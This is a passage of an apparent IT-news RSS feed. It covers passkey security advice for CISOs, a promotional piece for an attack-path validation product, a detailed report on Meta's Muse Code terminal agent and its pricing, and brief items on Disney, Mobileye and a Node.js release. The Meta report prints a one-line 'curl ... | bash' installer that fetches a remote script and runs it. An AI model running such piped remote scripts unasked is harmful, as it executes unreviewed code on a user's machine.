<p class="wp-block-paragraph">“On any service where your organization is the relying party, require user verification and actually validate the user-verified flag in the authentication response,” he said. “The researchers found real-world services accepting logins without it, which quietly collapses a multi-factor login back into a single factor.”</p>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, added that he would stress to CISOs that this attack assumes a prior successful penetration. </p>



<p class="wp-block-paragraph">“This isn’t passkeys getting hacked from across the internet. It’s what [an attacker] does once they’re already inside the house. So the real headline is that ‘phishing resistant’ stops being resistant the moment the endpoint stops being clean,” he said.</p>



<p class="wp-block-paragraph">“Stop treating verification as optional,” he advised. “Flip it to required, check it server side every single time, and save your hardware bound keys, the YubiKeys of the world, for the accounts that matter most. A key that never leaves a physical device is a key no attacker can ever harvest in bulk.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/orfink/" target="_blank" rel="noreferrer noopener">Or Finkelstein</a>, head of marketing at Secret Double Octopus, agreed that CISOs have gotten complacent about the way in which systems support passkeys.</p>



<p class="wp-block-paragraph">“CISOs should probably look at how user verification is enforced, how enrollment and recovery work, have a clear and enforced policy on whether credentials are synced or device-bound, and have some ITDR system to quickly mitigate suspicious endpoints and authenticators,” he said. “In most serious enterprise environments, EDR and device management reduce the likelihood of initial attacks, but do not close every post-compromise attack path.”</p>



<h2 class="wp-block-heading">Poor support processes weaken passkeys</h2>



<p class="wp-block-paragraph">Some have argued that the lack of sufficiently robust support processes actually weakens passkey capabilities and undermines the whole point of such systems.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/jwgoerlich/" target="_blank" rel="noreferrer noopener">J. Wolfgang Goerlich</a>, a member of the faculty of IANS and a longtime cybersecurity consultant, pointed out that the original FIDO2 spec eliminated credential theft by binding the private key to a physical authenticator. Synced passkeys reintroduced credential portability and therefore reintroduced the form of credential theft risk cited in the Palo Alto report.</p>



<p class="wp-block-paragraph">“A passwordless system is exactly as strong as the flow that re-establishes it,” he said. “Both serious techniques here start by forcing a device to re-enroll. Many security teams have never modeled, never monitored and never rehearsed a response to this.”</p>



<p class="wp-block-paragraph">Goerlich’s advice to CISOs is to require device-bound authenticators, such as hardware tokens or computers, for all privileged and sensitive access. They may consider allowing wallets for lower risk access, he said, “however, much like passwords in Web browsers have long been at risk, we must now consider passkeys in the browsers an unacceptable risk.”</p>



<p class="wp-block-paragraph">This article originally appeared on <a href="https://www.csoonline.com/article/4205751/report-passkey-security-issues-could-allow-account-takeover.html" target="_blank">CSOonline</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security validation should begin where attackers begin]]></title>
<description><![CDATA[Modern attacks increasingly begin with the web application.



Customer portals, partner platforms, APIs, external business applications, and AI-powered services have become the front door to the enterprise. The systems organizations build to create value are now the same systems attackers target...]]></description>
<link>https://tsecurity.de/de/3706994/it-security-nachrichten/security-validation-should-begin-where-attackers-begin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706994/it-security-nachrichten/security-validation-should-begin-where-attackers-begin/</guid>
<pubDate>Thu, 06 Aug 2026 00:27:43 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Modern attacks increasingly begin with the web application.</p>



<p class="wp-block-paragraph">Customer portals, partner platforms, APIs, external business applications, and AI-powered services have become the front door to the enterprise. The systems organizations build to create value are now the same systems attackers target for initial access.</p>



<p class="wp-block-paragraph">For years, security teams have invested heavily in protecting networks, endpoints, identities, and cloud infrastructure. Those investments remain essential, but the way attackers gain initial access has changed. Business-critical applications are internet-facing, constantly evolving, deeply connected to enterprise systems, and often changing faster than organizations can continuously validate them.</p>



<p class="wp-block-paragraph">Artificial intelligence is accelerating this shift. The time between vulnerability discovery and exploitation continues to shrink, allowing attackers to identify and weaponize weaknesses at machine speed. Yet while attacks have evolved, much of security validation still reflects yesterday’s architecture.</p>



<p class="wp-block-paragraph"><em>That shift is exactly why we built </em><a href="http://horizon3.ai/nodezero/webapp" target="_blank" rel="noreferrer noopener"><em>NodeZero WebApp</em></a><em>, extending autonomous attack validation to where modern attacks increasingly begin.</em></p>



<p class="wp-block-paragraph"><strong>Validation still reflects yesterday’s architecture</strong></p>



<p class="wp-block-paragraph">Most organizations still organize security by technology. Application security teams test web applications. Identity teams validate authentication and access controls. Cloud teams secure cloud infrastructure, while infrastructure teams assess networks and endpoints. Each discipline performs valuable work.</p>



<p class="wp-block-paragraph">The problem is that attackers don’t organize themselves the same way. They move across technologies, chaining weaknesses together until they reach their objective. A vulnerable application becomes compromised credentials. Compromised credentials become identity abuse. Identity abuse becomes access to cloud resources, infrastructure, and eventually the business systems they were after all along.</p>



<p class="wp-block-paragraph">Taken together, this means security validation often stops where the next stage of the attack begins.</p>



<p class="wp-block-paragraph"><strong>Attack paths don’t stop at the web application</strong></p>



<p class="wp-block-paragraph">A SQL injection isn’t the outcome. It’s the beginning of an attack path. An authentication weakness isn’t the breach. It’s simply the first opportunity to move deeper into the environment.</p>



<p class="wp-block-paragraph">The question isn’t whether a vulnerability exists. Security teams already have plenty of ways to answer that. The real question is what an attacker can do after exploiting it.</p>



<p class="wp-block-paragraph">Can they compromise identities? Reach sensitive data? Pivot into cloud resources? Move laterally into critical business systems?</p>



<p class="wp-block-paragraph">Security teams don’t lose because they missed a vulnerability. They lose because they never validated where it could lead. Modern attacks don’t unfold within a single technology stack. They move across applications, identities, infrastructure, and cloud environments until they create business impact. Security validation has to reflect that reality.</p>



<p class="wp-block-paragraph"><strong>Security validation has to change</strong></p>



<p class="wp-block-paragraph">For years, organizations validated individual technologies because that’s how enterprise environments were built. That approach made sense when applications, identities, infrastructure, and cloud platforms operated more independently and attackers moved more slowly.</p>



<p class="wp-block-paragraph">Today’s attacks don’t respect those boundaries. Validation shouldn’t either.</p>



<p class="wp-block-paragraph">It has to begin where attackers begin and continue until business impact is understood.</p>



<p class="wp-block-paragraph"><strong>Asking the right question</strong></p>



<p class="wp-block-paragraph">Many security tools begin with privileged knowledge. They analyze source code, configuration files, or other internal artifacts before identifying weaknesses. Those approaches answer important questions during software development and secure coding, and they remain an important part of building secure software.</p>



<p class="wp-block-paragraph">Attackers begin with what they can reach, interacting with an application as it exists in production, scouring exposed source code looking for novel vulnerabilities and stored identities, authenticating when they can, observing how it behaves, and looking for opportunities to move deeper into the environment. Every decision is driven by what the application reveals, not what its developers intended.</p>



<p class="wp-block-paragraph">Security validation should begin with the same perspective an attacker has, and answer the same question every attacker is trying to answer:</p>



<p class="wp-block-paragraph"><strong>What can I actually reach from here?</strong></p>



<p class="wp-block-paragraph">That shift changes more than where testing starts. It fundamentally changes what security teams learn from the exercise.</p>



<p class="wp-block-paragraph"> src="https://b2b-contenthub.com/wp-content/uploads/2026/08/configurationimages.png" alt="horizon3"&gt;Se<em>curity validation shouldn’t stop at anonymous pages. NodeZero WebApp safely validates authenticated application workflows, helping organizations assess the same privileged experiences attackers seek after gaining initial access.</em></p>



<p class="wp-block-paragraph">Click <a href="https://horizon3.ai/intelligence/blogs/web-application-security-validation/#:~:text=Extending%20Attack%20Validation%20to%20the%20Modern%20Entry%20Point" target="_blank" rel="noreferrer noopener">here</a> to discover how NodeZero WebApp addresses modern attacks.</p>



<p class="wp-block-paragraph"><strong>See NodeZero WebApp in action</strong></p>



<p class="wp-block-paragraph">Modern attacks start with web applications — but they rarely end there. Join our live webinar to see how NodeZero WebApp safely validates real attack paths from authenticated applications into identity, cloud, and infrastructure, helping you understand the business impact of exploitable weaknesses before attackers do.</p>



<p class="wp-block-paragraph">Register for our <a href="https://events.horizon3.ai/introducing-nodezero-webapp">webinar</a></p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta enters the AI coding wars with Muse Spark 1.2 and Muse Code with persistent async background agents]]></title>
<description><![CDATA[Meta today released Muse Code, a terminal-based AI coding agent now in beta, alongside Muse Spark 1.2, a coding-focused update to its Muse Spark family of frontier models — a one-two punch that puts the company in direct competition with Anthropic's Claude Code, OpenAI's Codex, and the growing fi...]]></description>
<link>https://tsecurity.de/de/3706941/it-nachrichten/meta-enters-the-ai-coding-wars-with-muse-spark-12-and-muse-code-with-persistent-async-background-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706941/it-nachrichten/meta-enters-the-ai-coding-wars-with-muse-spark-12-and-muse-code-with-persistent-async-background-agents/</guid>
<pubDate>Wed, 05 Aug 2026 23:34:25 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta today <a href="https://research.meta.ai/blog/introducing-muse-code-and-muse-spark-1-2?utm_source=ai_meta_site&amp;utm_medium=web&amp;utm_campaign=hp_research_muse-1-2_08052026&amp;utm_content=hp_research_muse-1-2_08052026">released Muse Code</a>, a terminal-based AI coding agent now in beta, alongside <a href="https://research.meta.ai/blog/introducing-muse-code-and-muse-spark-1-2?utm_source=ai_meta_site&amp;utm_medium=web&amp;utm_campaign=hp_research_muse-1-2_08052026&amp;utm_content=hp_research_muse-1-2_08052026">Muse Spark 1.2</a>, a coding-focused update to its Muse Spark family of frontier models — a one-two punch that puts the company in direct competition with Anthropic's Claude Code, OpenAI's Codex, and the growing field of agentic coding harnesses that have rapidly become the primary way many professional developers ship software.</p><p>"Releasing Muse Code in beta today," Meta CEO Mark Zuckerberg wrote in a <a href="https://x.com/finkd/status/2085080750034940201">post on rival social network X</a> (under his longtime handle @finkd). "It's a terminal coding agent that takes on complete software engineering tasks across large repos: planning changes, writing code, validating the results."</p><p>The launch marks Meta's most serious entry yet into a category it has largely watched from the sidelines. </p><p>While Anthropic and OpenAI turned their coding agents into flagship products — and startups like Cursor built billion-dollar businesses on the workflow — Meta's developer story long centered on Llama, the open-weight model family it gave away to the tune of more than a billion downloads. </p><p>Muse Code changes that in more ways than one: it's a full harness, installable on macOS or Linux with a single curl command, co-trained with the model that powers it — and, like the Muse Spark models behind it, entirely proprietary.</p><p>Developers and prospective users can install it now on their Terminal using the following one-line command — but be warned, if that's you, you'll need to log in with a Meta account and provide billing details first in order to begin: <code>curl -fsSL https://dev.meta.ai/install.sh | bash</code></p><h2><b>Persistent background agents and parallel worktrees</b></h2><p>Muse Code's headline architectural bet is what Meta calls <b>async background agents</b>. </p><p>Rather than spawning helper agents fresh for each task — the pattern most rival harnesses use — Muse Code keeps a set of <i>specialized background agents alive for the entire session. </i></p><p>According to Meta's blog post, these agents "remain active throughout each session, rather than being spawned for individual tasks, helping avoid redundant information gathering," carrying out next steps on their own and choosing when to report back to the main agent.</p><p>The practical pitch is less latency and less babysitting: an agent that already knows the repository doesn't have to re-explore it every time the developer asks for something new.</p><p>When a job is large enough, Muse Code fans out to separate sub-agents working in parallel, each in its own isolated git worktree, so the developer's working copy is never touched. </p><p>"In testing we had it build six features for a game simultaneously with no collisions," Zuckerberg wrote on X. </p><p>Worktree isolation and parallel sub-agents exist in competing tools, but Meta is leaning on the combination of persistence plus parallelism as its differentiator.</p><p>The second notable design choice is auditability. Every model call, tool run, approval, and edit is appended to a <b>local event log</b> before it executes — a single source of truth that Meta says makes the runtime "replay-exact and restart-safe." </p><p>If Muse Code crashes 20 hours into a long-running task, it resumes precisely where it stopped, with no lost work and no re-prompting. For engineering leaders who have been burned by opaque agent runs, a complete local audit trail may prove to be the feature that matters most in enterprise evaluations.</p><p>Muse Code also ships with bundled "skills" that will look familiar to users of rival tools: /plan turns a task into an approval-gated plan, /grill stress-tests that plan until it holds up, and /goal drives the agent toward completion of a stated objective.</p><h2><b>Muse Spark 1.2: co-trained with its own harness</b></h2><p>Under the hood is Muse Spark 1.2, which Meta describes as a coding-focused update to Muse Spark 1.1 with "significantly scaled up training compute on coding tasks" and broader training environment diversity, improving code generation, complex debugging, and codebase understanding while maintaining general agentic capability.</p><p>The update lands squarely on the Muse family's weakest flank. When the original Muse Spark <a href="https://venturebeat.com/technology/goodbye-llama-meta-launches-new-proprietary-ai-model-muse-spark-first-since">debuted in April</a>, it vaulted Meta back into the top five on frontier reasoning and vision benchmarks — but trailed on the agentic coding evaluations that matter most to this market, scoring 77.4 on SWE-Bench Verified against Claude Opus 4.6's 80.8 and Gemini 3.1 Pro's 80.6, and lagging well behind GPT-5.4 on GDPval's measure of long-horizon work tasks. </p><p>Four months later, a coding-specialized checkpoint paired with a purpose-built harness reads as Meta's direct answer to that gap.</p><p>Two training details stand out. First, Meta co-trained the model with Muse Code itself, using rejection-sampled harness trajectories and recipe optimizations for goals, context compaction, and sub-agents — meaning the model was explicitly tuned to perform best inside this particular tool. That mirrors an industry-wide shift away from treating models and harnesses as separable products.</p><p>Second, Meta used a self-improvement loop: Muse Spark 1.1 generated challenging coding environments and instruction-following templates, then graded candidate solutions against those requirements, producing a scalable training dataset for its successor. Meta credits the loop with making 1.2 measurably better at following complex instructions.</p><p>Meta published benchmark charts comparing Muse Spark 1.2 against other coding models on Terminal-Bench 2.1, DeepSWE 1.1, and an internal Meta coding benchmark, pointing readers to a separate methodology report for details — though the company did not headline specific scores in the announcement itself, a notable omission in a field where rivals trumpet leaderboard placement.</p><p>The company's most striking demonstration is a long-horizon case study: Meta pointed Muse Spark 1.2 at GPU kernel optimization and let it run for more than 1,000 tool calls over up to 24 hours on NVIDIA Hopper hardware.</p><p>Working in Triton and barred from simply wrapping existing third-party kernel libraries, the agent wrote, compiled, and profiled its way to what Meta calls "substantial improvements" over baseline implementations of KDA and MLA kernels — including genuinely non-obvious optimizations like re-centering gated cumulative decay at a chunk midpoint. </p><p>"It kept finding substantial improvements well beyond the initial exploration phase," Zuckerberg wrote. Sustained improvement over a 24-hour autonomous run, if it holds up outside Meta's demos, addresses one of the most persistent criticisms of coding agents: that they plateau or drift once past their initial burst of progress.</p><h2><b>Your data for a discount?</b></h2><p>The pricing structure may be the most consequential — and most scrutinized — part of the launch. Meta is offering Muse Spark 1.2 through its<a href="https://dev.meta.ai/docs/pricing-rate-limits?project_id=1661600634933790&amp;team_id=2096920474558192"> Meta Model API </a>in two tiers.</p><p>The <b>standard tier</b> is priced at $1.25 per million input tokens and $4.25 per million output tokens (with cached input at $0.15), and Meta commits that prompts and completions on this tier are not used to train its models. There is no long-context premium, and rate limits run to 3,000 requests and 4 million tokens per minute, per team. It's about mid-range price, compared to other leading AI models available over API. </p><p>The <b>contributor tier</b> is where Meta's strategy diverges sharply from its rivals: $0.10 per million input tokens and $0.20 per million output tokens — roughly 12x and 21x cheaper than standard, respectively, with cached input at a near-free $0.002 — in exchange for explicit permission to use your prompts and completions to train future Meta models. It's the cheapest available on the market, but you pay with your data — as described below. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p><b>Muse Spark 1.2 Contributor</b></p></td><td><p><b>$0.10</b></p></td><td><p><b>$0.20</b></p></td><td><p><b>$0.30</b></p></td><td><p><b></b><a href="https://dev.meta.ai/docs/pricing-rate-limits"><b>Meta</b></a><b></b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$0.20</p></td><td><p>$1.20</p></td><td><p>$1.40</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Gemini 3.5 Flash-Lite</p></td><td><p>$0.30</p></td><td><p>$2.50</p></td><td><p>$2.80</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Muse Spark 1.1 / 1.2</b></p></td><td><p><b>$1.25</b></p></td><td><p><b>$4.25</b></p></td><td><p><b>$5.50</b></p></td><td><p><b></b><a href="https://dev.meta.ai/docs/pricing-rate-limits"><b>Meta</b></a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.5</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://docs.x.ai/developers/models">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.8-Max</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://www.qwencloud.com/models/qwen3.8-max">QwenCloud</a></p></td></tr><tr><td><p>Gemini 3.6 Flash</p></td><td><p>$1.50</p></td><td><p>$7.50</p></td><td><p>$9.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Kimi K3</p></td><td><p>$3.00</p></td><td><p>$15.00</p></td><td><p>$18.00</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k3">Moonshot AI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 5</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Standard mode</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Fast mode</p></td><td><p>$10.00</p></td><td><p>$60.00</p></td><td><p>$70.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr></tbody></table><p>This is the tier Zuckerberg is steering new users toward: "It's easy and low-cost to get started," he wrote. "Install Muse Code with one line and you can start on our contributor tier."</p><p>In VentureBeat's own testing on a Mac mini, the one-line installer worked as advertised — a 97 MB download and a sign-in — but the agent stopped short of running anything, reporting that no models were visible and that payment was "required to finish setting up your account." </p><p>In other words, even the heavily discounted contributor tier requires a payment method on file before Muse Code will do any work: low-cost is accurate, but free is not.</p><p>Meta frames the contributor tier as lowering the barrier for prototyping and experimentation "where training on your data is acceptable." </p><p>But it also means the default on-ramp for Muse Code sends developers' code and prompts into Meta's training pipeline — a tradeoff enterprises with proprietary codebases will need to consciously opt out of by moving to standard pricing. </p><p>The contributor tier also carries much tighter rate limits (60 requests per minute versus 3,000), a clear signal it's aimed at individuals and small experiments rather than production workloads.</p><p>The approach is classically Meta: subsidize access, harvest data at scale, and use it to close the gap with the frontier. Zuckerberg made no secret of the ambition, calling Muse Spark 1.2 "our next step as we push toward frontier, with larger, more capable models on the way."</p><p>However, for developers and enterprises who want or are required legally to keep their code secure, the tradeoff may not be one they're willing or able to make. </p><h2><b>No Llama in sight</b></h2><p>What today's announcement conspicuously lacks is any mention of open source — a striking omission from the company that spent three years positioning itself as the standard-bearer of open AI.</p><p>From the original LLaMA's debut in February 2023 — whose weights famously leaked onto 4chan within weeks, inadvertently kickstarting the movement to run capable models on consumer hardware — through Llama 2's commercially usable license, the coding-specialized Code Llama, and the 405-billion-parameter Llama 3.1, which Zuckerberg launched in July 2024 with a manifesto titled "<a href="https://about.fb.com/news/2024/07/open-source-ai-is-the-path-forward/">Open Source AI Is the Path Forward</a>," Meta's entire pitch to developers was that frontier-class weights should be free to download, self-host, and fine-tune. </p><p>The strategy worked: by early 2026, the Llama family had been <a href="https://miraflow.ai/blog/meta-ended-llama-built-muse-spark-changes-everything-2026">downloaded roughly 1.2 billion times</a>, averaging about a million downloads a day, with self-hosting offering enterprises cost reductions VentureBeat has previously reported at as much as 88% versus proprietary API providers.</p><p>Then came the unraveling. Llama 4 debuted in April 2025 to <a href="https://venturebeat.com/ai/meta-defends-llama-4-release-against-reports-of-mixed-quality-blames-bugs">mixed reviews</a> and, eventually, admissions that its benchmark results had been fudged — while Chinese open-weight rivals from DeepSeek, Alibaba, and Zhipu AI surged to account for some 41% of downloads on Hugging Face by late 2025, eroding Llama's claim to leadership of the very movement it started. The rocky rollout spurred Zuckerberg's summer 2025 overhaul of Meta's AI operations into Meta Superintelligence Labs (MSL), with Scale AI co-founder Alexandr Wang recruited as chief AI officer.</p><p>The Llama era effectively ended this past April 8, when MSL <a href="https://venturebeat.com/technology/goodbye-llama-meta-launches-new-proprietary-ai-model-muse-spark-first-since">shipped the original Muse Spark</a> — "the most powerful model that meta has released," in Wang's words — as Meta's first proprietary model: <a href="https://mynextdeveloper.com/blogs/metas-muse-spark-the-end-of-open-source-for-llama/">cloud-only, with no downloadable weights and no self-hosting</a>, initially confined to Meta's apps and a private API preview. </p><p>Asked directly at the time whether Llama development would continue, a Meta spokesperson told VentureBeat only that "our current Llama models will continue to be available as open source" — pointedly silent on future ones.</p><p>Wang, for his part, said <a href="https://www.artificialintelligence-news.com/news/meta-muse-spark-ai-model-open-source/">bigger models were already in development "with plans to open-source future versions"</a> — but four months on, today's release does nothing to advance that promise: no weights, no license, and neither the blog post nor Zuckerberg's thread so much as uses the word "open."</p><p>The reversal is all the sharper because Meta's rivals have been moving in the opposite direction. OpenAI released its <a href="https://github.com/openai/codex">Codex CLI as open source </a>under the permissive, enterprise-friendly Apache 2.0 license and followed with its <a href="https://venturebeat.com/business/openai-returns-to-open-source-roots-with-new-models-gpt-oss-120b-and-gpt-oss-20b">gpt-oss open-weight models</a>; Google's<a href="https://venturebeat.com/technology/google-is-redefining-enterprise-ai-economics-with-open-source-gemini-cli-that-will-be-free-for-the-majority-of-developers"> Gemini CLI harness is likewise Apache-licensed.</a> </p><p>With Muse Code, Meta lands closest to the posture of Anthropic — whose Claude Code remains proprietary — while the company that once argued open source was the path forward now asks developers to pay per token for a model they cannot inspect, or to subsidize that access with their own data. </p><p>Seen in that light, the contributor tier reads as the successor to the Llama strategy itself: the ecosystem flywheel is no longer free weights in exchange for mindshare, but cheap tokens in exchange for training data.</p><h2><b>Why it matters</b></h2><p>Terminal coding agents have become the fastest-growing surface in enterprise AI, and until today the category has effectively been a two-horse race between Anthropic and OpenAI, with Google and a crowd of startups in pursuit.</p><p>Meta's entry brings a genuinely different architecture (persistent background agents, an append-only local event log), a credible long-horizon demo, and an aggressive pricing wedge.</p><p>The open questions are the ones benchmarks charts can't answer: whether Muse Spark 1.2 actually matches Claude and GPT-class models on real-world repositories, whether developers trust Meta with their code, and whether the contributor tier's discount is enough to make them stop asking. Muse Code is available in beta today; Muse Spark 1.2 is live in the Meta Model API with expanded global access.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Disney's latest TikTok deal shows it's betting on real creators instead of AI-generated videos]]></title>
<description><![CDATA[Disney is bringing creator-made vertical videos to Disney+ through a new partnership with TikTok, giving select creators access to its iconic franchises. Beyond the new content, the deal signals a broader shift toward embracing authentic fan creators over AI-generated videos.]]></description>
<link>https://tsecurity.de/de/3706716/it-nachrichten/disneys-latest-tiktok-deal-shows-its-betting-on-real-creators-instead-of-ai-generated-videos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706716/it-nachrichten/disneys-latest-tiktok-deal-shows-its-betting-on-real-creators-instead-of-ai-generated-videos/</guid>
<pubDate>Wed, 05 Aug 2026 23:16:42 +0200</pubDate>
<content:encoded><![CDATA[Disney is bringing creator-made vertical videos to Disney+ through a new partnership with TikTok, giving select creators access to its iconic franchises. Beyond the new content, the deal signals a broader shift toward embracing authentic fan creators over AI-generated videos.]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mobileye transformed support operations using Amazon Bedrock AgentCore]]></title>
<description><![CDATA[In this post, we'll explore how Mobileye deployed an AI support agentic solution on Amazon Bedrock AgentCore - from the support bottleneck that sparked the idea, through the proof of concept that validated it, to the hybrid architecture that bridges on-premises systems with AWS cloud services. Th...]]></description>
<link>https://tsecurity.de/de/3706605/ai-nachrichten/how-mobileye-transformed-support-operations-using-amazon-bedrock-agentcore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706605/ai-nachrichten/how-mobileye-transformed-support-operations-using-amazon-bedrock-agentcore/</guid>
<pubDate>Wed, 05 Aug 2026 20:18:53 +0200</pubDate>
<content:encoded><![CDATA[In this post, we'll explore how Mobileye deployed an AI support agentic solution on Amazon Bedrock AgentCore - from the support bottleneck that sparked the idea, through the proof of concept that validated it, to the hybrid architecture that bridges on-premises systems with AWS cloud services. This approach is relevant for enterprises struggling to scale AI Agents while maintaining enterprise grade governance and security standards.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: 2026-08-05, Version 26.7.0 (Current), @aduh95]]></title>
<description><![CDATA[Notable Changes

[58717685a1] - (SEMVER-MINOR) crypto: support loading private keys through STORE loaders (Filip Skokan) #63949
[44b940ee8c] - crypto: update root certificates to NSS 3.125 (Node.js GitHub Bot) #64746
[c1e4f7365e] - (SEMVER-MINOR) lib: add perfetto support (Chengzhong Wu) #64565
[...]]></description>
<link>https://tsecurity.de/de/3706487/downloads/github-2026-08-05-version-2670-current-aduh95/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706487/downloads/github-2026-08-05-version-2670-current-aduh95/</guid>
<pubDate>Wed, 05 Aug 2026 19:41:33 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h3>Notable Changes</h3>
<ul>
